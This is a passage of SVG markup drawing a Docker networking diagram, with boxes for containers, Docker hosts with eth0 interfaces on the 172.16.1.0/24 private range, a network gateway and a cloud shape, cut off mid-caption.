fill="rgb(0,0,0)" stroke="none" x="0" y="30" width="92" height="15" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="2" y="30" width="88" height="15" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="2" y="30" width="88" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="2" y="43">172</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="24" y="43">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="28" y="43">16</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="42" y="43">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="46" y="43">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="53" y="43">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="57" y="43">12</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="71" y="43">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="75" y="43">24</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,413,240)"><g transform="translate(4,4) scale(1.0045045045045045,1.0087719298245614)"><g><g transform="translate(0,0) scale(1.11,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9009009009009008,1.7543859649122808)"><path fill="#000000" stroke="none" d="M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.11,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9009009009009008,1.7543859649122808)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.73"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.73"/></g></g></g></g></g><g transform="matrix(1,0,0,1,423,247)"><g transform="translate(79,71) matrix(1,0,0,1,0,0) translate(-79,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="92" height="44" fill-opacity="0"/></g></g><g transform="translate(79,71) matrix(1,0,0,1,0,0) translate(-79,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="92" height="14" fill-opacity="0"/></g></g><g transform="translate(79,71) matrix(1,0,0,1,0,0) translate(-79,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="11" y="0" width="70" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="11" y="12">Container</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="63" y="12"> #</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="73" y="12">4</text></g><g transform="translate(79,71) matrix(1,0,0,1,0,0) translate(-79,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="92" height="30" fill-opacity="0"/></g></g><g transform="translate(79,71) matrix(1,0,0,1,0,0) translate(-79,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="33" y="14" width="88" height="30" fill-opacity="0"/></g></g><g transform="translate(79,71) matrix(1,0,0,1,0,0) translate(-79,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="33" y="14" width="88" height="30" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="33" y="27">eth0</text></g><g transform="translate(79,71) matrix(1,0,0,1,0,0) translate(-79,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="2" y="29" width="88" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="2" y="42">172</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="24" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="28" y="42">16</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="42" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="46" y="42">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="53" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="57" y="42">13</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="71" y="42">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="75" y="42">24</text></g></g><g transform="matrix(1,0,0,1,427.8675323681471,193.5)"><g transform="translate(0,0)"><g transform="translate(-315,26.067047119140625) translate(-112.86753236814712,-219.56704711914062) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#000000" d="M 468.5 240 L 432.3675323681471 198" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,342,193.49999999999997)"><g transform="translate(0,0)"><g transform="translate(-325,16.067047119140625) translate(-17,-209.5670471191406) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#000000" d="M 346.5 240 L 387.6324676318529 197.99999999999997" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,280,185)"><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="76" height="32" fill-opacity="0"/></g></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="76" height="16" fill-opacity="0"/></g></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="16" y="0" width="46" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="16" y="14">Docker</text></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="16" width="76" height="16" fill-opacity="0"/></g></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="16" width="50" height="14" fill-opacity="0"/></g></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="16" width="50" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="14" y="30">Host</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="43" y="30"> #</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="54" y="30">2</text></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="62" y="18" width="1" height="14" fill-opacity="0"/></g></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="16" width="1" height="14" fill-opacity="0"/></g></g></g><g transform="matrix(1,0,0,1,270.82345076546227,79.5019243141968)"><g transform="translate(0,0)"><g transform="translate(-70,-3.932952880859375) translate(-200.82345076546227,-75.56897143333742) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#000000" d="M 410 174 L 275.32345076546227 84.0019243141968" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="translate(0,0) matrix(1,0,0,1,167.32131882292583,39.0019243141968)"><g><g transform="translate(0,0) scale(2.1600318386915354,1.5512633057455518) translate(0.00001348378,-0.001498589)"><g><g><path fill="#FFFFFF" stroke="#434343" d="M 33.84 5.912 C 16.263 2.403 6.986 11.405 8.451 19.186 L 8.57 19.61 C -5.128 21.942 -1.537 38.106 5.033 38.106 L 5.679 38.085 C 4.026 45.68 20.032 53.41 28.958 49.548 L 29.531 48.92 C 32.713 55.752 44.02 56.893 55.201 57.177 C 64.89 57.425 70.546 56.658 74.702 52.411 L 75.341 52.599 C 90.852 53.845 97.915 43.133 94.526 35.442 L 95.36 35.207 C 100.648 33.808 101.258 21.602 92.187 19.797 L 92.361 19.325 C 96.299 11.385 87.011 3.896 74.124 5.303 L 73.23 4.837 C 64.003 -3.517 37.449 -2.157 34.373 6.108 L 33.84 5.912 Z" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,356,150)"><g transform="translate(4,4) scale(1.0046296296296295,1.0104166666666667)"><g><g transform="translate(0,0) scale(1.08,0.48)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9259259259259258,2.0833333333333335)"><path fill="#000000" stroke="none" d="M 10 0 L 98 0 Q 108 0 108 10 L 108 38 Q 108 48 98 48 L 10 48 Q 0 48 0 38 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 98 0 Q 108 0 108 10 L 108 38 Q 108 48 98 48 L 10 48 Q 0 48 0 38 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.08,0.48)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9259259259259258,2.0833333333333335)"><path fill="#cccccc" stroke="none" d="M 10 0 L 98 0 Q 108 0 108 10 L 108 38 Q 108 48 98 48 L 10 48 Q 0 48 0 38 L 0 10 Q 0 0 10 0 Z"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 98 0 Q 108 0 108 10 L 108 38 Q 108 48 98 48 L 10 48 Q 0 48 0 38 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="matrix(1,0,0,1,366,153)"><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="89" height="42" fill-opacity="0"/></g></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="89" height="14" fill-opacity="0"/></g></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="0" width="61" height="14" fill-opacity="0"/></g></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="0" width="61" height="14" fill-opacity="0"/></g></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="0" width="33" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="italic" font-weight="normal" text-decoration="" line-height="14px" x="14" y="12">(</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="italic" font-weight="normal" text-decoration="" line-height="14px" x="18" y="12">Host</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="italic" font-weight="normal" text-decoration="" line-height="14px" x="43" y="12">)</text></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="47" y="0" width="29" height="14" fill-opacity="0"/></g></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="47" y="0" width="29" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="50" y="12">eth0</text></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="1" height="14" fill-opacity="0"/></g></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="89" height="14" fill-opacity="0"/></g></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="1" y="14" width="88" height="14" fill-opacity="0"/></g></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="1" y="14" width="88" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="1" y="26">172</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="21" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="25" y="26">16</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="38" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="41" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="48" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="51" y="26">253</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="71" y="26">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="75" y="26">24</text></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="28" width="89" height="14" fill-opacity="0"/></g></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="11" y="28" width="68" height="14" fill-opacity="0"/></g></g><g transform="translate(160,126) matrix(1,0,0,1,0,0) translate(-160,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="11" y="28" width="68" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="11" y="40">(</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="15" y="40">IP</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="30" y="40">Optional</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="74" y="40">)</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,81,150)"><g transform="translate(4,4) scale(1.0046296296296295,1.0104166666666667)"><g><g transform="translate(0,0) scale(1.08,0.48)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9259259259259258,2.0833333333333335)"><path fill="#000000" stroke="none" d="M 10 0 L 98 0 Q 108 0 108 10 L 108 38 Q 108 48 98 48 L 10 48 Q 0 48 0 38 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 98 0 Q 108 0 108 10 L 108 38 Q 108 48 98 48 L 10 48 Q 0 48 0 38 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.08,0.48)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9259259259259258,2.0833333333333335)"><path fill="#cccccc" stroke="none" d="M 10 0 L 98 0 Q 108 0 108 10 L 108 38 Q 108 48 98 48 L 10 48 Q 0 48 0 38 L 0 10 Q 0 0 10 0 Z"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 98 0 Q 108 0 108 10 L 108 38 Q 108 48 98 48 L 10 48 Q 0 48 0 38 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="matrix(1,0,0,1,91,153)"><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="89" height="42" fill-opacity="0"/></g></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="89" height="14" fill-opacity="0"/></g></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="0" width="61" height="14" fill-opacity="0"/></g></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="0" width="61" height="14" fill-opacity="0"/></g></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="0" width="33" height="14" fill-opacity="0"/></g></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="0" width="33" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="italic" font-weight="normal" text-decoration="" line-height="14px" x="14" y="12">(</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="italic" font-weight="normal" text-decoration="" line-height="14px" x="18" y="12">Host</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="italic" font-weight="normal" text-decoration="" line-height="14px" x="43" y="12">)</text></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="47" y="0" width="29" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="50" y="12">eth0</text></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="1" height="14" fill-opacity="0"/></g></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="89" height="14" fill-opacity="0"/></g></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="1" y="14" width="88" height="14" fill-opacity="0"/></g></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="1" y="14" width="88" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="1" y="26">172</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="21" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="25" y="26">16</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="38" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="41" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="48" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="51" y="26">254</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="71" y="26">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="75" y="26">24</text></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="28" width="89" height="14" fill-opacity="0"/></g></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="11" y="28" width="68" height="14" fill-opacity="0"/></g></g><g transform="translate(127,126) matrix(1,0,0,1,0,0) translate(-127,-126)"><g><rect fill="rgb(0,0,0)" stroke="none" x="11" y="28" width="68" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="italic" font-weight="normal" text-decoration="" line-height="14px" x="11" y="40">(</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="italic" font-weight="normal" text-decoration="" line-height="14px" x="15" y="40">IP</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="italic" font-weight="normal" text-decoration="" line-height="14px" x="30" y="40">Optional</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="italic" font-weight="normal" text-decoration="" line-height="14px" x="74" y="40">)</text></g></g><g transform="matrix(1,0,0,1,226,64)"><g transform="translate(117,64) matrix(1,0,0,1,0,0) translate(-117,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="117" height="32" fill-opacity="0"/></g></g><g transform="translate(117,64) matrix(1,0,0,1,0,0) translate(-117,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="117" height="16" fill-opacity="0"/></g></g><g transform="translate(117,64) matrix(1,0,0,1,0,0) translate(-117,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="3" y="0" width="111" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="3" y="14">Network</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="58" y="14">Gateway</text></g><g transform="translate(117,64) matrix(1,0,0,1,0,0) translate(-117,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="16" width="117" height="16" fill-opacity="0"/></g></g><g transform="translate(117,64) matrix(1,0,0,1,0,0) translate(-117,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="16" y="16" width="87" height="16" fill-opacity="0"/></g></g><g transform="translate(117,64) matrix(1,0,0,1,0,0) translate(-117,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="16" y="16" width="67" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="16" y="30">172</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="39" y="30">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="43" y="30">16</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="59" y="30">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="62" y="30">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="70" y="30">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="74" y="30">1</text></g><g transform="translate(117,64) matrix(1,0,0,1,0,0) translate(-117,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="82" y="16" width="21" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="82" y="30">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="86" y="30">24</text></g></g><g transform="matrix(1,0,0,1,2,317)"><g transform="translate(1,0) matrix(1,0,0,1,0,0) translate(-1,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="538" height="36" fill-opacity="0"/></g></g><g transform="translate(1,0) matrix(1,0,0,1,0,0) translate(-1,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="538" height="18" fill-opacity="0"/></g></g><g transform="translate(1,0) matrix(1,0,0,1,0,0) translate(-1,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="1" y="0" width="536" height="17" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="1" y="15">Containers</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="83" y="15">Attached</text><text fill="rgb(0, 0, 